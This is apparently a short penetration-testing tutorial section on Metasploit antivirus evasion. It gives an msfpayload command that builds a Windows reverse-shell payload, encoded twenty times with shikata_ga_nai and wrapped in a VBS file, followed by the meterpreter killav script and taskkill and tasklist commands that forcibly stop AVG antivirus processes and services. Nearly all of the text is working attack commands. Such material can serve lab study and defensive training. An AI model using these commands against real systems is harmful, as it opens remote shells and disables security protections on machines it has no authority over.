msfpayload windows/shell/reverse_tcp LHOST=192.168.56.101 R | msfencode -e x86/shikata_ga_nai -c 20 -t vbs -x cmd.exe > .local/cmdtest2.vbs

 

6.6 killav.rb

1. run killav

meterpreter > run killav

2. Reading the killav.rb script

kali2:/usr/share/metasploit-framework/scripts/meterpreter/killav.rb

The script holds a complete list of process names in a %W array, searches for them on the target and kills them.

Each name in the array is matched against the processes on the target system; a match is terminated with the process.kill function.

3. Still not disabled?

The antivirus may be running as a service: after the process is killed, the service immediately starts it again.

Processes are per-user, while services are system-level.

Taking AVG antivirus as an example:

tasklist: lists the running tasks

       the /SVC switch lists only processes running as services

      the /F switch of taskkill forcibly terminates a process

tasklist /SVC | find /I "avg"

taskkill /F /IM "avg*"

C:\Users\lenovo>tasklist /SVC | find /I "avg"

C:\Users\lenovo>taskkill /F /IM "avg*"

4. Some services still cannot be disabled?

net stop

sc config
